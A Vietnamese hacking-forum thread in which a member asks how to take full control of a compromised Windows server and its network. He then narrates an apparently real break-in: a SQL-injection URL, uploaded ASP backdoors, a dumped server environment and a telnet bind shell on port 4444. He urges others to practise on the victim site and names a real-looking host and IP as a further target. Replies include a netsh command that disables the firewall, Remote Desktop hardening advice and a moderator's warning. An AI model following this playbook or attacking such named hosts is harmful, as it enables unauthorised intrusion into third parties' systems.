[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
24/07/2006 12:03:23 (+0700) | #1 | 9494 |
|
vnsofts
Member
|
0 |
|
|
Joined: 23/07/2006 23:32:05
Messages: 47
Offline
|
|
Em là newbie nên chưa biết nhiều mong các bác chỉ giáo thêm!
Giả sử em xâm nhập vào được một cái server và nối được telnet rồi (Tức là có thể thực hiện toàn bộ lệnh Dos ở trên server đó). Em muốn hỏi một số vấn đề sau:
1. Làm thế nào để đọc được hết toàn bộ các thông tin trong các máy được nối mạng nội bộ với nhau. Làm thế nào để chiếm được toàn bộ quyền điều khiển và tài nguyên ở các máy đó?
2. Làm thế nào để đọc được các thông tin trong mail server, ftp server, domain, ..
3. Làm thế nào để Remote Desktop Connection trực tiếp được đến cái server đấy. Giả sử em upload toàn bộ chương trình Remote Client lên server đó rồi và dùng regsvr32.exe để đăng ký dll, ocx,.. nhưng khi Remote Desktop thì nó báo lỗi. Làm cách nào để Remote được?
Rất mong các trao đổi góp ý thêm. Các bác có thể trao đổi tại đây hoặc PM cho em. |
|
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
25/07/2006 12:27:33 (+0700) | #2 | 9780 |
|
Mulan
HVA Friend
|
Joined: 01/02/2002 15:09:07
Messages: 274
Location: 127.0.0.1
Offline
|
|
Đây là các câu hỏi chứ không còn là trao đổi nữa, có vẻ như quá nhiều nhỉ?
Sẽ mất thời gian để mổ sẻ nhưng nếu để ăn sổi kiểu hạ gục càng nhanh càng tốt thì mình cũng không biết |
|
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
26/08/2006 06:58:51 (+0700) | #3 | 18123 |
|
vnsofts
Member
|
0 |
|
|
Joined: 23/07/2006 23:32:05
Messages: 47
Offline
|
|
Thì em đặt ra câu hỏi để mọi người cùng trò chuyện và thảo luận mà. Ý Mulan định nói là Trao & Đổi ? |
|
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
26/08/2006 07:20:37 (+0700) | #4 | 18129 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
vnsofts wrote:
Em là newbie nên chưa biết nhiều mong các bác chỉ giáo thêm!
Giả sử em xâm nhập vào được một cái server và nối được telnet rồi (Tức là có thể thực hiện toàn bộ lệnh Dos ở trên server đó). Em muốn hỏi một số vấn đề sau:
Lệnh DOS? vậy đây là Windoze?
vnsofts wrote:
1. Làm thế nào để đọc được hết toàn bộ các thông tin trong các máy được nối mạng nội bộ với nhau. Làm thế nào để chiếm được toàn bộ quyền điều khiển và tài nguyên ở các máy đó?
Tham khảo trọn bộ các "lệnh" DOS cho phép trên win9x, w2k, wxp, w2k3... và xác định máy mình telnet vô được rồi đang chạy trên hđh nào để mà thực hiện.
Tham khảo cách sử dụng hđh Windows nói chung để biết các thông tin trên nằm ở đâu.
Chiếm trọn bộ quyền điều khiển tuỳ vào hoàn cảnh. Nếu server config "chuối" quá thì có thể không cần các thao tác + công cụ hỗ trợ. Nếu nó config quá kỹ thì... google "privilege elevation in windows" và thử ngâm cứu xem.
vnsofts wrote:
2. Làm thế nào để đọc được các thông tin trong mail server, ftp server, domain, ..
Mấy cái server kia cùng 1 máy hay khác máy?
- nếu cùng một máy, tham khảo câu trả lời trên.
- nếu khác máy, tuỳ mạng này có chế độ "trust" hay không. Nếu không, thử "telnet" tiếp :lol .
vnsofts wrote:
3. Làm thế nào để Remote Desktop Connection trực tiếp được đến cái server đấy. Giả sử em upload toàn bộ chương trình Remote Client lên server đó rồi và dùng regsvr32.exe để đăng ký dll, ocx,.. nhưng khi Remote Desktop thì nó báo lỗi. Làm cách nào để Remote được?
Báo lỗi gì? RD service trên máy đó có thật sự chạy chưa? Nó có bị firewall không?
vnsofts wrote:
Rất mong các trao đổi góp ý thêm. Các bác có thể trao đổi tại đây hoặc PM cho em.
Bồ chỉ hỏi chớ chưa thấy cái gì mang tính trao đổi cả ).
Muốn thâm nhập và control một hệ thống, việc đầu tiên là phải hiểu rõ và sâu về hệ thống ấy. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
26/08/2006 23:31:34 (+0700) | #5 | 18226 |
channhua
Elite Member
|
0 |
|
|
Joined: 18/07/2003 04:49:28
Messages: 338
Offline
|
|
Báo lỗi gì? RD service trên máy đó có thật sự chạy chưa? Nó có bị firewall không?
À anh comale: mình tắt firewall trên máy khác (xp sp2) bằng dos dùng cách nào vậy anh (khi có pass và user đầy đủ của máy đó, ví dụ trong mạng Lan thôi ) em suy nghĩ hoài không ra
Mặc định trên win xp thì nó bật firewall và cấm RD service
Các câu hỏi của bạn rất hay. Mời mọi người tham gia
Vấn đề về các server em nghĩ là vnsoft đang nói trên windows và các server thì riêng rẽ và đã Trust với nhau
|
|
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
26/08/2006 23:49:33 (+0700) | #6 | 18231 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
channhua wrote:
Báo lỗi gì? RD service trên máy đó có thật sự chạy chưa? Nó có bị firewall không?
À anh comale: mình tắt firewall trên máy khác (xp sp2) bằng dos dùng cách nào vậy anh (khi có pass và user đầy đủ của máy đó, ví dụ trong mạng Lan thôi ) em suy nghĩ hoài không ra
Nếu đã vào được máy đó rồi và máy đó dùng xp sp2 firewall thì trên DOS command gõ:
C:\>netsh
netsh>
Sau đó gõ:
netsh>firewall
và
netsh firewall>? để tìm hiểu thêm các options.
Cụ thể turn off:
netsh firewall>set opmode disable
Mấy cái này vào trang microsoft và search qua 1 vòng là có đầy hết.
Như anh đã nói ở trên, muốn thâm nhập và hack một system, điều đầu tiên là phải sử dụng nhuần nhuyễn system ấy. Thâm nhập thật sự không thể dùng mục tiêu thâm nhập để "thực tập" cách sử dụng. Thâm nhập thật sự là một chuỗi hành động mang tính "chạy đua với thời gian".
Thân. |
|
What bringing us together is stronger than what pulling us apart. |
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
27/08/2006 05:04:02 (+0700) | #7 | 18308 |
|
vnsofts
Member
|
0 |
|
|
Joined: 23/07/2006 23:32:05
Messages: 47
Offline
|
|
Giả sử em chọn một server trong đó có host được gắn vào domain sau: [victim.com]
1. Tìm kiếm lỗi để upload được file lên host nằm trong server đấy (Sở dĩ em lấy host này làm ví dụ vì nó bị lỗi sql-injection thì quá đơn giản để thực hành việc upload một file)
Lỗi khai thác: http://[victim.com]/companynews.asp?ID=40'
2. Giả sử em upload thành công và cài đặt được con backdoor lên host. Vậy là với con backdoor này em đã nắm được thông tin về:
Cài backdoor 1: http://[victim.com]/admin/process/editconpanynews.asp
(Để xử dụng được con backdoor này các bác phải có mật khẩu để đăng nhập - Các bac tự hack và vào ngay dòng đầu tiên có chữ Password để lấy mật khẩu)
+ Toàn bộ thông tin về các files, thư mục, ổ đĩa, ..
+ Chiếm quyền điều khiển toàn bộ máy chủ SQL Server
+ Lấy được một phần thông tin trong host
+ Tạo đường kết nối với máy Client
(Mong các anh em không phá huỷ trang web của họ mà chỉ lấy đó làm nơi để thực tập)
3. Chạy con backdoor tiếp theo để lấy các thông tin về server
Cài backdoor 2: http://[victim.com]/admin/process/CheckServer.asp
(Backdoor này em viết riêng để xài nên ko share được mong các bác thông cảm)
Domain Name [victim.com] / 209.195.x.x
Server Port 80 Script Timeout 90
Server Software Microsoft-IIS/5.0 Number of Processors 2
Operating System Windows_NT System Path C:\WINNT
Full path & url URL: http://[victim.com]/admin/process/CheckServer.asp
Path: e:\users\[victim]1\public_html\admin\process\CheckServer.asp
Current Time Sat Aug 26 04:39:32 EDT 2006
Sat Aug 26 15:47:42 UTC+0700 2006
ComSpec %SystemRoot%\system32\cmd.exe
DellAgentPath E:\Program Files\Dell\OpenManage\OMSA\bin
DSETPATH C:\Program Files\Dell\DSET
NUMBER_OF_PROCESSORS 2
OMPATH E:\Program Files\Dell\OpenManage\oma\bin;E:\Program Files\Dell\OpenManage\LU\bin;E:\Program Files\Dell\OpenManage\oldiags\bin
OS Windows_NT
Os2LibPath %SystemRoot%\system32\os2\dll;
Path C:\Program Files\VERITAS\NetBackup\bin\;E:\Perl\bin\;C:\Program Files\Common Files\VERITAS Shared;E:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Network Associates\VirusScan Engine\4.0.xx\;C:\Program Files\Microsoft SQL Server\80\Tools\BINN;%OMPATH%;%DellAGENTPath%;c:\unxutils\usr\local\wbin
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE x86
PROCESSOR_IDENTIFIER x86 Family 6 Model 8 Stepping 10, GenuineIntel
PROCESSOR_LEVEL 6
PROCESSOR_REVISION 080a
TEMP %SystemRoot%\TEMP
TMP %SystemRoot%\TEMP
windir %SystemRoot%
ALL_HTTP HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP_ACCEPT_LANGUAGE:en-us
HTTP_CONNECTION:Keep-Alive
HTTP_HOST:[victim.com]
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP_ACCEPT_ENCODING:gzip, deflate
ALL_RAW Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Connection: Keep-Alive
Host: [victim.com]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Accept-Encoding: gzip, deflate
APPL_MD_PATH /LM/W3SVC/92/Root
APPL_PHYSICAL_PATH e:\users\[victim]1\public_html\
AUTH_PASSWORD
AUTH_TYPE
AUTH_USER
CERT_COOKIE
CERT_FLAGS
CERT_ISSUER
CERT_KEYSIZE
CERT_SECRETKEYSIZE
CERT_SERIALNUMBER
CERT_SERVER_ISSUER
CERT_SERVER_SUBJECT
CERT_SUBJECT
CONTENT_LENGTH 0
CONTENT_TYPE
GATEWAY_INTERFACE CGI/1.1
HTTPS off
HTTPS_KEYSIZE
HTTPS_SECRETKEYSIZE
HTTPS_SERVER_ISSUER
HTTPS_SERVER_SUBJECT
INSTANCE_ID 92
INSTANCE_META_PATH /LM/W3SVC/92
LOCAL_ADDR 209.195.x.x
LOGON_USER
PATH_INFO /admin/process/CheckServer.asp
PATH_TRANSLATED e:\users\[victim]1\public_html\admin\process\CheckServer.asp
QUERY_STRING
REMOTE_ADDR 222.252.87.33
REMOTE_HOST 222.252.87.33
REMOTE_USER
REQUEST_METHOD GET
SCRIPT_NAME /admin/process/CheckServer.asp
SERVER_NAME [victim.com]
SERVER_PORT 80
SERVER_PORT_SECURE 0
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE Microsoft-IIS/5.0
URL /admin/process/CheckServer.asp
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP_ACCEPT_LANGUAGE en-us
HTTP_CONNECTION Keep-Alive
HTTP_HOST [victim.com]
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP_ACCEPT_ENCODING gzip, deflate
MSWC.AdRotator true
MSWC.BrowserType true 4.00
MSWC.NextLink true
MSWC.Tools true
MSWC.Status true
MSWC.Counters true
MSWC.PermissionChecker true
WScript.Shell true
Scripting.FileSystemObject true
ADODB.Connection ( ActiveX Data Object [ADO] ) true 2.6
CDONTS.NewMail ( Collaboration Data Object [CDO] ) true 1.2
SoftArtisans.FileUp ( SA-FileUp 文件上传 ) true 3, 0, 1, 3
SoftArtisans.FileManager ( SA-FM 文件管理 ) true
SMTPsvg.Mailer ( ASPmail ) true 4.03
e:\users\[victim]1\public_html\admin\process
0
25
603.13 KB
A: 3.5 N/A N/A N/A
C: HardDisk NTFS 468.84 MB 3.94 GB
D: CD Room N/A N/A N/A
E: HardDisk NTFS 215.38 MB 12.95 GB
G: HardDisk NTFS 26.49 GB 34.17 GB
…
4. Cài backdoor tiếp theo để mở cộng và kết nối telnet hoặc dùng backdoor 1 để khởi động
Cài Backdoor 3: http://[victim.com]/admin/process/remote.asp
Vào Start -> Run -> CMD chạy Telnet
Vào Telnet gõ thông số như sau Telnet 209.195.x.x 4444
Kết quả xuất hiện trên màn hình:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Vậy là ta đã chiếm được quyền điều khiển của server này thông qua host bị lỗi đó. Nhưng vấn đề chiếm được quyền điều khiển của một sever đơn lẻ là quá đơn giản (Vì đây chỉ là một máy đơn lẻ trong cả mạng). Bây giờ bạn đã có thể kết nối trực tiếp được với telnet rồi mong các bạn cùng nhau thảo luận về các vấn đề đã nêu ở trên.
Bạn không nên public những thông tin nhạy cảm như vậy, dạng victim.com là được rùi ) .
Edited by Quan Vân Trường. |
|
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
27/08/2006 23:15:19 (+0700) | #8 | 18459 |
subnetwork
Member
|
0 |
|
|
Joined: 05/09/2004 06:08:09
Messages: 1666
Offline
|
|
vnsofts wrote:
Em là newbie nên chưa biết nhiều mong các bác chỉ giáo thêm!
Giả sử em xâm nhập vào được một cái server và nối được telnet rồi (Tức là có thể thực hiện toàn bộ lệnh Dos ở trên server đó). Em muốn hỏi một số vấn đề sau:
1. Làm thế nào để đọc được hết toàn bộ các thông tin trong các máy được nối mạng nội bộ với nhau. Làm thế nào để chiếm được toàn bộ quyền điều khiển và tài nguyên ở các máy đó?
2. Làm thế nào để đọc được các thông tin trong mail server, ftp server, domain, ..
3. Làm thế nào để Remote Desktop Connection trực tiếp được đến cái server đấy. Giả sử em upload toàn bộ chương trình Remote Client lên server đó rồi và dùng regsvr32.exe để đăng ký dll, ocx,.. nhưng khi Remote Desktop thì nó báo lỗi. Làm cách nào để Remote được?
Rất mong các trao đổi góp ý thêm. Các bác có thể trao đổi tại đây hoặc PM cho em.
Ở đây tui không bàn tán đến vấn đề : làm thế nào chui vô máy windows của người khác tui chĩ bình luận một chút Remote Desktop (cách thức làm việc)
Remote Desktop là nền tãng của Terminal Service . Terminal Services client sử dụng port 3389 TCP cho việc truyền thông với máy tính từ xa
Thiết lập mức độ mã hóa
Mã hóa dữ liệu có thể bảo vệ dữ liệu của bạn bằng cách mã hóa nó trên đường truyền thông giữa client và máy tính sử dụng Windows XP Professional . Bảo vệ mã hóa đề phòng việc rủi ro dữ liệu truyền đi bị ngăn chặn một cách trái phép . Mặc định phiên làm việc Remote Desktop được mã hóa ở mức cao nhất của bảo mật cho phép (sử dụng 128 bit) .
Tuy nhiên , một vài phiên bãn cũ của phần mềm Terminal Services client không hỗ trợ mức mã hóa này . Bạn có thể thiết lập mức độ mã hóa của kết nối mục đích nhằm gởi và nhận dữ liệu ở mức mã hóa cao nhất hỗ trợ bởi client . Có hai mức mã hóa được cho phép : High và Client Compatible .
High. Mức High mã hóa dữ liệu gởi từ client đến máy tính từ xa và từ máy tính từ xa đến client bằng cách sử dụng mã hóa mạnh đến 128 bit . Sử dụng mức này nếu bạn chắc chắn máy tính client của bạn hỗ trợ mã hóa 128 bit (ví dụ nếu nó chạy trên Windows XP Professional) . Clients không hỗ trợ mức mã hóa này sẽ không được nối kết .
Client Compatible. Mức mã hóa dữ liệu Client Compatible gởi giữa client và máy tính từ xa ở khóa từ client . Sử dụng mức này nếu máy tính client của bạn không hỗ trợ mã hóa 128 bit . bạn có thể thiết lập mức độ mã hóa của kết nối giữa client và máy tính từ xa bằng cách cho phép chức năng Set client connection encryption level Properties trong thiết lập Terminal Services Group Policy.
Cho phép xác nhận thẩm quyền cho mật khẩu ở thời gian đăng nhập
Để tăng cường bảo mật cho một phiên làm việc Remote Desktop qua Internet , bạn phải giới hạn chức năng bỏ qua mật khẩu tự động .
Để làm điều này bạn có thể bật chức năng Always prompt client for password trong Terminal Services Group Policy .Khi thiết lập được cho phép , bạn phải cung cấp mật khẩu của bạn trong hộp thoại Windows Logon bất cứ lúc nào khi bạn bắt đầu một phiên làm việc với Remote Desktop .
Ngoài ra bạn nên tắt các chức năng sau trong Terminal Services Group Policy : Do not allow clipboard wwwection , Do not allow printer wwwection , Do not allow drive wwwectio
Thân |
|
Quản lý máy chủ, cài đặt, tư vấn, thiết kế, bảo mật hệ thống máy chủ dùng *nix
http://chamsocmaychu.com |
|
|
|
[Question] Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
13/07/2008 13:30:39 (+0700) | #9 | 141406 |
|
vnsofts
Member
|
0 |
|
|
Joined: 23/07/2006 23:32:05
Messages: 47
Offline
|
|
@ conmale
conmale wrote:
vnsofts wrote:
Em là newbie nên chưa biết nhiều mong các bác chỉ giáo thêm!
Giả sử em xâm nhập vào được một cái server và nối được telnet rồi (Tức là có thể thực hiện toàn bộ lệnh Dos ở trên server đó). Em muốn hỏi một số vấn đề sau:
Lệnh DOS? vậy đây là Windoze?
Ai chẳng biết là dùng DÓS nhưng mà dùng lệnh gì mới là vấn đề. Ví dụ muốn xem các user/pass nằm trong database của FTP thì xem như thế nào? hay chỉ dùng mấy lệnh Net view ...
Ngoài cách lấy mấy file DAT để decode Sam thì có cách nào view được user/pass của windows không?
vnsofts wrote:
1. Làm thế nào để đọc được hết toàn bộ các thông tin trong các máy được nối mạng nội bộ với nhau. Làm thế nào để chiếm được toàn bộ quyền điều khiển và tài nguyên ở các máy đó?
Tham khảo trọn bộ các "lệnh" DOS cho phép trên win9x, w2k, wxp, w2k3... và xác định máy mình telnet vô được rồi đang chạy trên hđh nào để mà thực hiện.
Tham khảo cách sử dụng hđh Windows nói chung để biết các thông tin trên nằm ở đâu.
Chiếm trọn bộ quyền điều khiển tuỳ vào hoàn cảnh. Nếu server config "chuối" quá thì có thể không cần các thao tác + công cụ hỗ trợ. Nếu nó config quá kỹ thì... google "privilege elevation in windows" và thử ngâm cứu xem.
Chỉ riêng DOS thì làm ăn được gì hả? Để khai thác các máy trong cung mạng LAN ngoài việc dùng các lệnh nội trú và ngoại trú thì cần phải có các tools để nâng quyền và mở kết nối để khai thác,.. Với cái này thì câu trở lời của bác quá thừa.
vnsofts wrote:
2. Làm thế nào để đọc được các thông tin trong mail server, ftp server, domain, ..
Mấy cái server kia cùng 1 máy hay khác máy?
- nếu cùng một máy, tham khảo câu trả lời trên.
- nếu khác máy, tuỳ mạng này có chế độ "trust" hay không. Nếu không, thử "telnet" tiếp :lol .
Tất nhiên là khác máy rùi. Khi các nhà cung cấp dịch vụ cấu hình server theo kiểu bảo mật thì thường là máy mail riêng, web và ftp riêng, máy mssql riêng,... Theo bác nếu cùng máy thì khai thác thế nào, khác máy thì khai thi khai thác thế nào?
vnsofts wrote:
3. Làm thế nào để Remote Desktop Connection trực tiếp được đến cái server đấy. Giả sử em upload toàn bộ chương trình Remote Client lên server đó rồi và dùng regsvr32.exe để đăng ký dll, ocx,.. nhưng khi Remote Desktop thì nó báo lỗi. Làm cách nào để Remote được?
Báo lỗi gì? RD service trên máy đó có thật sự chạy chưa? Nó có bị firewall không?
Làm thế nào để kiểm tra RD service đã chay hay ko? Và có cách nào để kiểm tra firewall có chặn hay ko?
vnsofts wrote:
Rất mong các trao đổi góp ý thêm. Các bác có thể trao đổi tại đây hoặc PM cho em.
Bồ chỉ hỏi chớ chưa thấy cái gì mang tính trao đổi cả ).
Muốn thâm nhập và control một hệ thống, việc đầu tiên là phải hiểu rõ và sâu về hệ thống ấy.
Hiểu về hệ thống là phải hiểu như thế nào? Mình đã upload được backdoor lên đó. Đã chiếm được các thông tin tài nguyên trong máy. Đã khởi động netcat ở chế độ lắng nghe và telnet được tới máy victim như vậy đã được gọi là hiểu về hệ thống chưa bác?
------------------------------------------------------------
@subnetwork
subnetwork wrote:
vnsofts wrote:
Em là newbie nên chưa biết nhiều mong các bác chỉ giáo thêm!
Giả sử em xâm nhập vào được một cái server và nối được telnet rồi (Tức là có thể thực hiện toàn bộ lệnh Dos ở trên server đó). Em muốn hỏi một số vấn đề sau:
1. Làm thế nào để đọc được hết toàn bộ các thông tin trong các máy được nối mạng nội bộ với nhau. Làm thế nào để chiếm được toàn bộ quyền điều khiển và tài nguyên ở các máy đó?
2. Làm thế nào để đọc được các thông tin trong mail server, ftp server, domain, ..
3. Làm thế nào để Remote Desktop Connection trực tiếp được đến cái server đấy. Giả sử em upload toàn bộ chương trình Remote Client lên server đó rồi và dùng regsvr32.exe để đăng ký dll, ocx,.. nhưng khi Remote Desktop thì nó báo lỗi. Làm cách nào để Remote được?
Rất mong các trao đổi góp ý thêm. Các bác có thể trao đổi tại đây hoặc PM cho em.
Ở đây tui không bàn tán đến vấn đề : làm thế nào chui vô máy windows của người khác tui chĩ bình luận một chút Remote Desktop (cách thức làm việc)
Remote Desktop là nền tãng của Terminal Service . Terminal Services client sử dụng port 3389 TCP cho việc truyền thông với máy tính từ xa
Thiết lập mức độ mã hóa
Mã hóa dữ liệu có thể bảo vệ dữ liệu của bạn bằng cách mã hóa nó trên đường truyền thông giữa client và máy tính sử dụng Windows XP Professional . Bảo vệ mã hóa đề phòng việc rủi ro dữ liệu truyền đi bị ngăn chặn một cách trái phép . Mặc định phiên làm việc Remote Desktop được mã hóa ở mức cao nhất của bảo mật cho phép (sử dụng 128 bit) .
Tuy nhiên , một vài phiên bãn cũ của phần mềm Terminal Services client không hỗ trợ mức mã hóa này . Bạn có thể thiết lập mức độ mã hóa của kết nối mục đích nhằm gởi và nhận dữ liệu ở mức mã hóa cao nhất hỗ trợ bởi client . Có hai mức mã hóa được cho phép : High và Client Compatible .
High. Mức High mã hóa dữ liệu gởi từ client đến máy tính từ xa và từ máy tính từ xa đến client bằng cách sử dụng mã hóa mạnh đến 128 bit . Sử dụng mức này nếu bạn chắc chắn máy tính client của bạn hỗ trợ mã hóa 128 bit (ví dụ nếu nó chạy trên Windows XP Professional) . Clients không hỗ trợ mức mã hóa này sẽ không được nối kết .
Client Compatible. Mức mã hóa dữ liệu Client Compatible gởi giữa client và máy tính từ xa ở khóa từ client . Sử dụng mức này nếu máy tính client của bạn không hỗ trợ mã hóa 128 bit . bạn có thể thiết lập mức độ mã hóa của kết nối giữa client và máy tính từ xa bằng cách cho phép chức năng Set client connection encryption level Properties trong thiết lập Terminal Services Group Policy.
Cho phép xác nhận thẩm quyền cho mật khẩu ở thời gian đăng nhập
Để tăng cường bảo mật cho một phiên làm việc Remote Desktop qua Internet , bạn phải giới hạn chức năng bỏ qua mật khẩu tự động .
Để làm điều này bạn có thể bật chức năng Always prompt client for password trong Terminal Services Group Policy .Khi thiết lập được cho phép , bạn phải cung cấp mật khẩu của bạn trong hộp thoại Windows Logon bất cứ lúc nào khi bạn bắt đầu một phiên làm việc với Remote Desktop .
Ngoài ra bạn nên tắt các chức năng sau trong Terminal Services Group Policy : Do not allow clipboard wwwection , Do not allow printer wwwection , Do not allow drive wwwectio
Thân
Lý thuyết của bạn hay lắm vậy bạn thử làm ví dụ với con server này thông qua Hót này xem
http://tri-shore.com (IP: 209.211.251.193)
C:\>mstsc.exe /v 209.211.251.193 |
|
|
|
|
[Question] Re: Thảo luận về cách đoạt toàn bộ quyền điều khiển Server |
13/07/2008 20:17:14 (+0700) | #10 | 141411 |
FaL
Moderator
|
Joined: 14/04/2006 09:31:18
Messages: 1232
Offline
|
|
Cảnh cáo đồng chí vnsofts: Đây không phải là chỗ khích bác, thách thức.
Muốn hiểu rõ hệ thống trước hết là suy nghĩ cho kỹ reply của anh conmale trước khi hỏi: Làm sao pha được 1 tô mì ăn liền? |
|
Hãy giữ một trái tim nóng và một cái đầu lạnh |
|
|